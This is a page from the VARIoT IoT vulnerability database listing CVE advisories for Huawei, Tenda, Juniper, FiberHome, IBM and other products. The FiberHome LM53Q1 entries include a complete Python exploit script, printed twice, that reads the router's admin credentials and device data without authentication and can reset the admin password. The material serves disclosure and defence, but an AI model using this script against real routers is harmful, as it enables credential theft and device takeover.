VARIoT IoT vulnerabilities database
| VAR-201711-0236 | CVE-2017-2720 | FusionSphere OpenStack Vulnerable to information disclosure |
CVSS V2: 5.0 CVSS V3: 5.3 Severity: MEDIUM |
FusionSphere OpenStack V100R006C00 has an information exposure vulnerability. The software uses a hard-coded cryptographic key to encrypt messages between certain components, which significantly increases the likelihood that encrypted data can be recovered and results in information exposure. FusionSphere OpenStack contains an information disclosure vulnerability; information may be obtained. Huawei FusionSphere OpenStack is cloud platform software for Huawei's FusionSphere cloud operating system, used in ICT scenarios. The vulnerability is caused by the program using a hard-coded encryption key to encrypt messages between components.
| VAR-201711-0235 | CVE-2017-2719 | FusionSphere OpenStack Command injection vulnerability |
CVSS V2: 8.3 CVSS V3: 8.8 Severity: HIGH |
FusionSphere OpenStack V100R006C00 and V100R006C10RC2 have two command injection vulnerabilities due to insufficient input validation on one port. An attacker can exploit the vulnerabilities to gain root privileges by sending messages containing malicious commands. FusionSphere OpenStack contains a command injection vulnerability; information may be obtained, information may be altered, and service operation may be disrupted (DoS). Huawei FusionSphere OpenStack is cloud platform software for Huawei's FusionSphere cloud operating system, used in ICT scenarios.
| VAR-201711-0234 | CVE-2017-2718 | FusionSphere OpenStack Command injection vulnerability |
CVSS V2: 8.3 CVSS V3: 8.8 Severity: HIGH |
FusionSphere OpenStack V100R006C00 and V100R006C10RC2 have two command injection vulnerabilities due to insufficient input validation on one port. An attacker can exploit the vulnerabilities to gain root privileges by sending messages containing malicious commands. The FusionSphere OpenStack software contains a command injection vulnerability; information may be obtained, information may be altered, and service operation may be disrupted (DoS). Huawei FusionSphere OpenStack is cloud platform software for Huawei's FusionSphere cloud operating system, used in ICT scenarios.
| VAR-201711-0231 | CVE-2017-2715 | Huawei smartphone Files application Information disclosure vulnerability |
CVSS V2: 2.1 CVSS V3: 7.8 Severity: HIGH |
The Files APP 7.1.1.309 and earlier versions on some Huawei mobile phones has a brute-force password cracking vulnerability due to the improper design of the Safe key database. An unauthorized attacker could access sensitive database information and may crack users' Safe passwords, leading to an information leak. The Huawei smartphone Files application contains an information disclosure vulnerability; information may be obtained, information may be altered, and service operation may be disrupted (DoS). Huawei Files APP is a file management application from the Chinese company Huawei.
| VAR-201711-0230 | CVE-2017-2714 | FusionSphere OpenStack Buffer error vulnerability |
CVSS V2: 7.7 CVSS V3: 8.0 Severity: HIGH |
The GaussDB in FusionSphere OpenStack V100R005C10SPC705 and earlier versions has a buffer overflow vulnerability. An authenticated attacker on the LAN can exploit this vulnerability to execute arbitrary code or cause a denial of service (DoS) condition on the affected system. FusionSphere OpenStack contains a buffer error vulnerability; information may be obtained, information may be altered, and service operation may be disrupted (DoS). Huawei FusionSphere OpenStack is cloud platform software for Huawei's FusionSphere cloud operating system, used in ICT scenarios. GaussDB is one of the databases it ships with.
| VAR-201711-0225 | CVE-2017-2709 | HiGame and SkyTone Input validation vulnerability |
CVSS V2: 4.3 CVSS V3: 5.5 Severity: MEDIUM |
HiGame versions earlier than 7.3.0 and SkyTone versions earlier than 8.1.1 have a DoS vulnerability. If an attacker tricks a user into installing a malicious application on the smartphone, the attacker can send malformed packets to the device; because the apps lack adequate input validation, this causes a denial of service in the apps. HiGame and SkyTone contain an input validation vulnerability; service operation may be disrupted (DoS). Both Huawei HiGame and SkyTone are products of the Chinese company Huawei. Huawei HiGame is a mobile game download application; SkyTone is a dedicated Internet access application for Huawei mobile phones.
| VAR-201711-0630 | CVE-2017-16923 | Multiple Shenzhen Tenda devices Command injection vulnerability |
CVSS V2: 8.3 CVSS V3: 8.8 Severity: HIGH |
Command injection vulnerability in app_data_center on Shenzhen Tenda Ac9 US_AC9V1.0BR_V15.03.05.14_multi_TD01, Ac9 ac9_kf_V15.03.05.19(6318_)_cn, Ac15 US_AC15V1.0BR_V15.03.05.18_multi_TD01, Ac15 US_AC15V1.0BR_V15.03.05.19_multi_TD01, Ac18 US_AC18V1.0BR_V15.03.05.05_multi_TD01, and Ac18 ac18_kf_V15.03.05.19(6318_)_cn devices allows remote unauthenticated attackers to execute arbitrary OS commands via a crafted cgi-bin/luci/usbeject?dev_name= GET request from the LAN. This occurs because the "sub_A6E8 usbeject_process_entry" function executes a system function with untrusted input. The Shenzhen Tenda Ac9, Ac15 and Ac18 devices contain a command injection vulnerability; information may be obtained, information may be altered, and service operation may be disrupted (DoS). Shenzhen Tenda Ac9 and the other listed models are wireless router products of Tenda, and app_data_center is one of their application data-center components. There is a command injection vulnerability in app_data_center in several Shenzhen Tenda products; the affected versions are those listed above.
| VAR-201711-0643 | CVE-2017-5729 | Multiple Intel Dual-Band and Tri-Band Wireless-AC products Data processing vulnerability |
CVSS V2: 5.8 CVSS V3: 7.4 Severity: HIGH |
Frame replay vulnerability in the Wi-Fi subsystem of Intel Dual-Band and Tri-Band Wireless-AC products allows a remote attacker to replay frames via a channel-based man-in-the-middle. Multiple Intel Dual-Band and Tri-Band Wireless-AC products contain a data processing vulnerability; information may be altered and service operation may be disrupted (DoS). Intel Dual Band Wireless-AC 3160 and related products are wireless adapters from Intel Corporation of the United States. The Wi-Fi subsystem in several of these Intel products contains this security vulnerability.
| VAR-201804-1054 | CVE-2017-7004 | Apple iOS and macOS Security component Vulnerability bypassing restrictions on sending XPC messages |
CVSS V2: 5.1 CVSS V3: 7.0 Severity: HIGH |
An issue was discovered in certain Apple products. iOS before 10.3.2 is affected. macOS before 10.12.5 is affected. The issue involves the "Security" component. A race condition allows attackers to bypass intended entitlement restrictions for sending XPC messages via a crafted app. Both Apple iOS and macOS Sierra are products of Apple Inc. Apple iOS is an operating system developed for mobile devices; macOS Sierra is an operating system developed for Mac computers. An attacker could exploit this vulnerability via a native application to send privileged XPC messages.
| VAR-201801-1073 | CVE-2018-0005 | Juniper Networks Junos OS Vulnerabilities in checking for exceptional conditions |
CVSS V2: 5.8 CVSS V3: 8.8 Severity: HIGH |
QFX and EX Series switches configured to drop traffic when the MAC move limit is exceeded will forward traffic instead of dropping it. This can lead to denial of service or other unintended conditions. Affected releases are Juniper Networks Junos OS: 14.1X53 versions prior to 14.1X53-D40; 15.1X53 versions prior to 15.1X53-D55; 15.1 versions prior to 15.1R7. Juniper Networks Junos OS contains an exceptional condition checking vulnerability; information may be obtained, information may be altered, and service operation may be disrupted (DoS). Juniper Junos is prone to a denial-of-service vulnerability.
An attacker may exploit this issue to cause denial-of-service conditions. Both the Juniper QFX and EX Series are switch products of Juniper Networks. Junos OS is the operating system that runs on them.
| VAR-201801-1072 | CVE-2018-0004 | Juniper Networks Junos OS Vulnerable to resource exhaustion |
CVSS V2: 7.1 CVSS V3: 6.5 Severity: MEDIUM |
A sustained sequence of different types of normal transit traffic can trigger a high-CPU-consumption denial of service condition in the Junos OS register and schedule software interrupt handler subsystem when a specific command is issued to the device. This affects one or more threads and, in turn, one or more processes running on the system. Once this occurs, the high CPU event(s) affect either or both of the forwarding and control planes. As a result, the device can become inaccessible in either or both planes and stops forwarding traffic until it is rebooted. The issue will recur after reboot upon receiving further transit traffic. Score: 5.7 MEDIUM (CVSS:3.0/AV:A/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H). For network designs utilizing layer 3 forwarding agents or other ARP-through-layer-3 technologies, the score is slightly higher. Score: 6.5 MEDIUM (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H). If the following entry exists in the RE message logs, it may indicate that the issue is present; the entry may or may not appear when the issue occurs: /kernel: Expensive timeout(9) function: Affected releases are Juniper Networks Junos OS: 12.1X46 versions prior to 12.1X46-D50; 12.3X48 versions prior to 12.3X48-D30; 12.3R versions prior to 12.3R12-S7; 14.1 versions prior to 14.1R8-S4, 14.1R9; 14.1X53 versions prior to 14.1X53-D30, 14.1X53-D34; 14.2 versions prior to 14.2R8; 15.1 versions prior to 15.1F6, 15.1R3; 15.1X49 versions prior to 15.1X49-D40; 15.1X53 versions prior to 15.1X53-D31, 15.1X53-D33, 15.1X53-D60. No other Juniper Networks products or platforms are affected by this issue. Juniper Networks Junos OS contains a resource exhaustion vulnerability; service operation may be disrupted (DoS). Juniper Junos is prone to a denial-of-service vulnerability.
Exploiting this issue allows remote attackers to cause a denial-of-service condition through excessive CPU consumption. The operating system provides a secure programming interface and the Junos SDK. A denial of service vulnerability exists in Juniper Junos OS.
| VAR-201801-1071 | CVE-2018-0003 | Juniper Networks Junos OS Resource management vulnerability |
CVSS V2: 6.1 CVSS V3: 6.5 Severity: MEDIUM |
A specially crafted MPLS packet received or processed by the system on an interface configured with MPLS will store information in system memory. Subsequently, if this stored information is accessed, it may result in a kernel crash leading to a denial of service. Affected releases are Juniper Networks Junos OS: 12.1X46 versions prior to 12.1X46-D71; 12.3 versions prior to 12.3R12-S7; 12.3X48 versions prior to 12.3X48-D55; 14.1 versions prior to 14.1R8-S5, 14.1R9; 14.1X53 versions prior to 14.1X53-D45, 14.1X53-D107; 14.2 versions prior to 14.2R7-S7, 14.2R8; 15.1 versions prior to 15.1F5-S8, 15.1F6-S8, 15.1R5-S6, 15.1R6-S3, 15.1R7; 15.1X49 versions prior to 15.1X49-D100; 15.1X53 versions prior to 15.1X53-D65, 15.1X53-D231; 16.1 versions prior to 16.1R3-S6, 16.1R4-S6, 16.1R5; 16.1X65 versions prior to 16.1X65-D45; 16.2 versions prior to 16.2R2-S1, 16.2R3; 17.1 versions prior to 17.1R2-S2, 17.1R3; 17.2 versions prior to 17.2R1-S3, 17.2R2; 17.2X75 versions prior to 17.2X75-D50. No other Juniper Networks products or platforms are affected by this issue. Juniper Networks Junos OS contains a resource management vulnerability; service operation may be disrupted (DoS). Juniper Junos is prone to a denial-of-service vulnerability. The operating system provides a secure programming interface and the Junos SDK.
| VAR-201801-1070 | CVE-2018-0002 | Juniper Networks Junos OS Resource management vulnerability |
CVSS V2: 4.3 CVSS V3: 5.9 Severity: MEDIUM |
On SRX Series and MX Series devices with a Service PIC and any ALG enabled, a crafted TCP/IP response packet processed through the device results in memory corruption leading to a flowd daemon crash. Sustained crafted response packets lead to repeated crashes of the flowd daemon, resulting in an extended denial of service condition. Affected releases are Juniper Networks Junos OS: 12.1X46 versions prior to 12.1X46-D60 on SRX series; 12.3X48 versions prior to 12.3X48-D35 on SRX series; 14.1 versions prior to 14.1R9 on MX series; 14.2 versions prior to 14.2R8 on MX series; 15.1X49 versions prior to 15.1X49-D60 on SRX series; 15.1 versions prior to 15.1R5-S8, 15.1F6-S9, 15.1R6-S4, 15.1R7 on MX series; 16.1 versions prior to 16.1R6 on MX series; 16.2 versions prior to 16.2R3 on MX series; 17.1 versions prior to 17.1R2-S4, 17.1R3 on MX series. No other Juniper Networks products or platforms are affected by this issue. Juniper Networks Junos OS contains a resource management vulnerability; service operation may be disrupted (DoS). Juniper Junos is prone to a denial-of-service vulnerability.
An attacker can exploit this issue to cause the daemon(s) to crash, effectively denying service to legitimate users. Junos OS is the operating system that runs on these devices.
| VAR-201801-1069 | CVE-2018-0001 | Juniper Networks Junos OS Use-after-free vulnerability |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
A remote, unauthenticated attacker may be able to execute code by exploiting a use-after-free defect found in older versions of PHP, through injection of crafted data via specific PHP URLs within the context of the J-Web process. Affected releases are Juniper Networks Junos OS: 12.1X46 versions prior to 12.1X46-D67; 12.3 versions prior to 12.3R12-S5; 12.3X48 versions prior to 12.3X48-D35; 14.1 versions prior to 14.1R8-S5, 14.1R9; 14.1X53 versions prior to 14.1X53-D44, 14.1X53-D50; 14.2 versions prior to 14.2R7-S7, 14.2R8; 15.1 versions prior to 15.1R3; 15.1X49 versions prior to 15.1X49-D30; 15.1X53 versions prior to 15.1X53-D70. Juniper Networks Junos OS contains a use-after-free vulnerability; information may be obtained, information may be altered, and service operation may be disrupted (DoS). Juniper Junos is prone to a remote code-execution vulnerability.
Attackers can exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely cause a denial-of-service condition. Juniper Junos OS is the network operating system of Juniper Networks, dedicated to the company's hardware systems. The operating system provides a secure programming interface and the Junos SDK.
| VAR-201711-0642 | CVE-2017-5719 | Intel Deep Learning Training Tool Access control vulnerability |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
A vulnerability in the Intel Deep Learning Training Tool Beta 1 allows a network attacker to remotely execute code as a local user. The tool supports visual tuning and running of deep learning algorithms.
| VAR-201801-0580 | CVE-2017-16885 | FiberHome mobile WIFI Device model LM53Q1 Permissions vulnerability |
CVSS V2: 5.0 CVSS V3: 9.8 Severity: CRITICAL |
Improper permissions handling in the Portal on FiberHome LM53Q1 VH519R05C01S38 devices (intended for obtaining information about Internet usage, changing passwords, etc.) allows remote attackers to read this information without authenticating. The information includes the device version, firmware ID, users connected to the device along with their MAC addresses, etc. FiberHome mobile WIFI device model LM53Q1 contains a permissions vulnerability; information may be obtained, information may be altered, and service operation may be disrupted (DoS). The FiberHome LM53Q1 is a portable router device from FiberHome of China. There is an information disclosure vulnerability in the Portal of the FiberHome LM53Q1 VH519R05C01S38 version, caused by the program not enforcing the correct permissions. The proof-of-concept script published for this and the two related CVEs follows.

#!/usr/bin/python
# Exploit Title: FiberHome MIFI LM53Q1 Multiple Vulnerabilities
# Exploit Author: Ibad Shah
# Vendor Homepage: www.fiberhome.com
# Version: VH519R05C01S38
# Tested on: Linux
# Platform : Hardware
# CVE : CVE-2017-16885, CVE-2017-16886, CVE-2017-16887
# Greetz : Taimoor Zafar, Jawad Ahmed, Owais Mehtab, Aitezaz Mohsin, ZHC
import requests,sys,getopt,socket,struct
#Declaring IP as our global variable to probe for Gateway IP of Device
global ip
#Getting Gateway IP Address
def get_default_gateway_linux():
    with open("/proc/net/route") as fh:
        for line in fh:
            fields = line.strip().split()
            if fields[1] != '00000000' or not int(fields[3], 16) & 2:
                continue
            return socket.inet_ntoa(struct.pack("<L", int(fields[2], 16)))
    return;
ip = get_default_gateway_linux()
exploit_title = "=============================================== \n FiberHome Remote Administrator Account Details \n================================================";
#Function to get Device Statistics
def get_device_details():
    gateway = None
    hardware = None
    device_name = None
    devices_all = ''
    version = None
    gateway = None
    ssid = ''
    dns1 = None
    dns2 = None
    requestStatus = requests.get("http://192.168.8.1/xml_action.cgi?method=get&module=duster&file=status1")
    api_response = requestStatus.content.replace('\t','').split('\n')
    for results in api_response:
        if "<hardware_version>" in results:
            hardware = results.replace('<hardware_version>','').replace('</hardware_version>','').replace(' ','').replace('\n','')
        if "<device_name>" in results:
            device_name = results.replace('<device_name>','').replace('</device_name>','').replace(' ','').replace('\n','')
        if "<version_num>" in results:
            version = results.replace('<version_num>','').replace('</version_num>','').replace(' ','').replace('\n','')
        if "<gateway>" in results:
            gateway = results.replace('<gateway>','').replace('</gateway>','').replace(' ','').replace('\n','')
        if "<ssid>" in results:
            ssid = results.replace('<ssid>','').replace('</ssid>','').replace('\n','')
        if "<dns1>" in results:
            dns1 = results.replace('<dns1>','').replace('</dns1>','').replace(' ','').replace('\n','')
        if "<dns2>" in results:
            dns2 = results.replace('<dns2>','').replace('</dns2>','').replace(' ','').replace('\n','')
        if "<IMEI>" in results:
            imei = results.replace('<IMEI>','').replace('</IMEI>','').replace(' ','').replace('\n','')
            print "\n=============================================="
            print "\nHardware Version of Device : "+hardware+"\n"
            print "\nName of Device : "+device_name+"\n"
            print "\nSoftware Version of Device : "+version+"\n"
            print "\nIMEI of Device! : "+imei+"\n"
            print "\nWiFi SSID of Device : "+ssid+"\n"
            print "\nGateway of Zong Device : "+gateway+"\n"
            print "\nDNS Primary of Device : "+dns1+"\n"
            print "\nDNS Secondary of Device : "+dns2+"\n"
            print "\n=============================================================================\n";
        if "<known_devices_list>" in results:
            devices_all = results.replace('<known_devices_list>','').replace('</known_devices_list>','').replace('\n','')
            print "\nConnected Devices to WIFI\n"
            print devices_all
#Function for getting User Account Details to login to Portal
def get_user_account_details():
    request = requests.get("http://"+ip+"/xml_action.cgi?method=get&module=duster&file=admin")
    admin_details = request.content.replace('\t','').split('\n')
    for admin_login_response in admin_details:
        if "<router_username>" in admin_login_response:
            username = admin_login_response.replace('<router_username>','').replace('</router_username>','')
        if "<router_password>" in admin_login_response:
            password = admin_login_response.replace('<router_password>','').replace('</router_password>','')
            print "\nUsername of Device Web Application :\n"+username+" "
            print "Password of Device Web Application :\n"+password+"\n"
            print "\n=============================================================================\n";
#Function to change Administrator Password
def change_admin_password():
    set_password = raw_input("\nEnter Password to Change : ")
    password = str(set_password)
    xml = "<?xml version='1.0' encoding='UTF-8'?><RGW><management><router_password>"+password+"</router_password></management></RGW>"
    headers = {'Content-Type': 'application/xml'}
    change_password_request = requests.post("http://"+ip+"/xml_action.cgi?method=set&module=duster&file=admin", data=xml, headers=headers).text
    print "Password Changed!"
def main():
    print exploit_title
    print "\nSelect Menu For Fetching Details \n \n 1. Get Portal Login & Password. \n 2. Get Other Details. \n 3. Change Admin Password for Device"
    get_option = raw_input("\n Enter Option : ");
    option = int(get_option)
    if get_option == "1":
        get_user_account_details()
        raw_input("\n Press Any Key To Exit");
    elif get_option == "2":
        get_device_details()
        raw_input("\n Press Any Key To Exit");
    elif get_option == "3":
        change_admin_password()
    elif get_option == "":
        print "Good Bye!";
    else:
        print "Goodbye!";
main()
| VAR-201801-0581 | CVE-2017-16886 | FiberHome mobile WIFI Device model LM53Q1 Vulnerable to cross-site request forgery |
CVSS V2: 6.8 CVSS V3: 8.8 Severity: HIGH |
The portal on the FiberHome Mobile WIFI Device Model LM53Q1 VH519R05C01S38 uses SOAP-based web services to interact with the portal. Unauthorized access to these web services via CSRF can result in an unauthorized change of the portal administrator's username or password. FiberHome mobile WIFI device model LM53Q1 contains a cross-site request forgery vulnerability; information may be obtained, information may be altered, and service operation may be disrupted (DoS). The FiberHome Mobile WIFI Device LM53Q1 is a portable router device from FiberHome of China. The vulnerability exists in the portal of the FiberHome Mobile WIFI Device LM53Q1 VH519R05C01S38 release. The same proof-of-concept script listed under CVE-2017-16885 above covers this CVE.
| VAR-201801-0582 | CVE-2017-16887 | FiberHome mobile WIFI Device model LM53Q1 Permissions vulnerability |
CVSS V2: 5.0 CVSS V3: 9.8 Severity: CRITICAL |
The portal on the FiberHome Mobile WIFI Device Model LM53Q1 VH519R05C01S38 uses SOAP-based web services to interact with the portal. Unauthorized access to these web services can result in disclosure of the WLAN key/password. FiberHome mobile WIFI device model LM53Q1 contains a permissions vulnerability; information may be obtained, information may be altered, and service operation may be disrupted (DoS). The FiberHome Mobile WIFI Device LM53Q1 is a portable router device from FiberHome of China. The vulnerability exists in the portal of the FiberHome Mobile WIFI Device LM53Q1 VH519R05C01S38 release. An attacker could exploit the vulnerability to obtain the WLAN key/password. The same proof-of-concept script listed under CVE-2017-16885 above covers this CVE.
# Exploit Title: FiberHome MIFI LM53Q1 Multiple Vulnerabilities
# Exploit Author: Ibad Shah
# Vendor Homepage: www.fiberhome.com
# Version: VH519R05C01S38
# Tested on: Linux
# Platform : Hardware
# CVE : CVE-2017-16885, CVE-2017-16886, CVE-2017-16887
# Greetz : Taimoor Zafar, Jawad Ahmed, Owais Mehtab, Aitezaz Mohsin, ZHC
import requests, sys, getopt, socket, struct

# Declaring ip as our global variable to probe for the gateway IP of the device
global ip

# Getting the gateway IP address from the Linux routing table
def get_default_gateway_linux():
    with open("/proc/net/route") as fh:
        for line in fh:
            fields = line.strip().split()
            # Skip entries that are not the default route or lack the RTF_GATEWAY flag
            if fields[1] != '00000000' or not int(fields[3], 16) & 2:
                continue
            return socket.inet_ntoa(struct.pack("<L", int(fields[2], 16)))
    return

ip = get_default_gateway_linux()
exploit_title = "=============================================== \n FiberHome Remote Administrator Account Details \n================================================"

# Function to get device statistics
def get_device_details():
    gateway = None
    hardware = None
    device_name = None
    devices_all = ''
    version = None
    ssid = ''
    dns1 = None
    dns2 = None
    requestStatus = requests.get("http://192.168.8.1/xml_action.cgi?method=get&module=duster&file=status1")
    api_response = requestStatus.content.replace('\t', '').split('\n')
    for results in api_response:
        if "<hardware_version>" in results:
            hardware = results.replace('<hardware_version>', '').replace('</hardware_version>', '').replace(' ', '').replace('\n', '')
        if "<device_name>" in results:
            device_name = results.replace('<device_name>', '').replace('</device_name>', '').replace(' ', '').replace('\n', '')
        if "<version_num>" in results:
            version = results.replace('<version_num>', '').replace('</version_num>', '').replace(' ', '').replace('\n', '')
        if "<gateway>" in results:
            gateway = results.replace('<gateway>', '').replace('</gateway>', '').replace(' ', '').replace('\n', '')
        if "<ssid>" in results:
            ssid = results.replace('<ssid>', '').replace('</ssid>', '').replace('\n', '')
        if "<dns1>" in results:
            dns1 = results.replace('<dns1>', '').replace('</dns1>', '').replace(' ', '').replace('\n', '')
        if "<dns2>" in results:
            dns2 = results.replace('<dns2>', '').replace('</dns2>', '').replace(' ', '').replace('\n', '')
        if "<IMEI>" in results:
            imei = results.replace('<IMEI>', '').replace('</IMEI>', '').replace(' ', '').replace('\n', '')
            # The summary is printed once the IMEI element has been reached
            print "\n=============================================="
            print "\nHardware Version of Device : " + hardware + "\n"
            print "\nName of Device : " + device_name + "\n"
            print "\nSoftware Version of Device : " + version + "\n"
            print "\nIMEI of Device! : " + imei + "\n"
            print "\nWiFi SSID of Device : " + ssid + "\n"
            print "\nGateway of Zong Device : " + gateway + "\n"
            print "\nDNS Primary of Device : " + dns1 + "\n"
            print "\nDNS Secondary of Device : " + dns2 + "\n"
            print "\n=============================================================================\n"
        if "<known_devices_list>" in results:
            devices_all = results.replace('<known_devices_list>', '').replace('</known_devices_list>', '').replace('\n', '')
            print "\nConnected Devices to WIFI\n"
            print devices_all

# Function for getting user account details to log in to the portal
def get_user_account_details():
    request = requests.get("http://" + ip + "/xml_action.cgi?method=get&module=duster&file=admin")
    admin_details = request.content.replace('\t', '').split('\n')
    for admin_login_response in admin_details:
        if "<router_username>" in admin_login_response:
            username = admin_login_response.replace('<router_username>', '').replace('</router_username>', '')
        if "<router_password>" in admin_login_response:
            password = admin_login_response.replace('<router_password>', '').replace('</router_password>', '')
            print "\nUsername of Device Web Application :\n" + username + " "
            print "Password of Device Web Application :\n" + password + "\n"
            print "\n=============================================================================\n"

# Function to change the administrator password
def change_admin_password():
    set_password = raw_input("\nEnter Password to Change : ")
    password = str(set_password)
    xml = "<?xml version='1.0' encoding='UTF-8'?><RGW><management><router_password>" + password + "</router_password></management></RGW>"
    headers = {'Content-Type': 'application/xml'}
    change_password_request = requests.post("http://" + ip + "/xml_action.cgi?method=set&module=duster&file=admin", data=xml, headers=headers).text
    print "Password Changed!"

def main():
    print exploit_title
    print "\nSelect Menu For Fetching Details \n \n 1. Get Portal Login & Password. \n 2. Get Other Details. \n 3. Change Admin Password for Device"
    get_option = raw_input("\n Enter Option : ")
    option = int(get_option)
    if get_option == "1":
        get_user_account_details()
        raw_input("\n Press Any Key To Exit")
    elif get_option == "2":
        get_device_details()
        raw_input("\n Press Any Key To Exit")
    elif get_option == "3":
        change_admin_password()
    elif get_option == "":
        print "Good Bye!"
    else:
        print "Goodbye!"

main()
| VAR-201712-0245 | CVE-2017-1548 | IBM Sterling File Gateway Path traversal vulnerability |
CVSS V2: 5.0 CVSS V3: 5.3 Severity: MEDIUM |
IBM Sterling File Gateway 2.2 could allow a remote attacker to traverse directories on the system. An attacker could send a specially-crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system. IBM X-Force ID: 131288. The vendor has confirmed this vulnerability and released it as IBM X-Force ID: 131288. Information may be obtained.
An attacker can exploit these issues using directory-traversal characters ('../') to read arbitrary files that contain sensitive information, to reach files outside of the restricted directory, or to perform other attacks. The software consolidates different centers of file transfer activity and facilitates the secure exchange of file-based data over the Internet.
| VAR-201712-0246 | CVE-2017-1549 | IBM Sterling File Gateway Vulnerable to cross-site scripting |
CVSS V2: 3.5 CVSS V3: 5.4 Severity: MEDIUM |
IBM Sterling File Gateway 2.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI, thus altering the intended functionality and potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 131289. The vendor has confirmed this vulnerability and released it as IBM X-Force ID: 131289. Information may be obtained and information may be altered.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. The software consolidates different centers of file transfer activity and facilitates the secure exchange of file-based data over the Internet. The vulnerability stems from the program not filtering input submitted by users.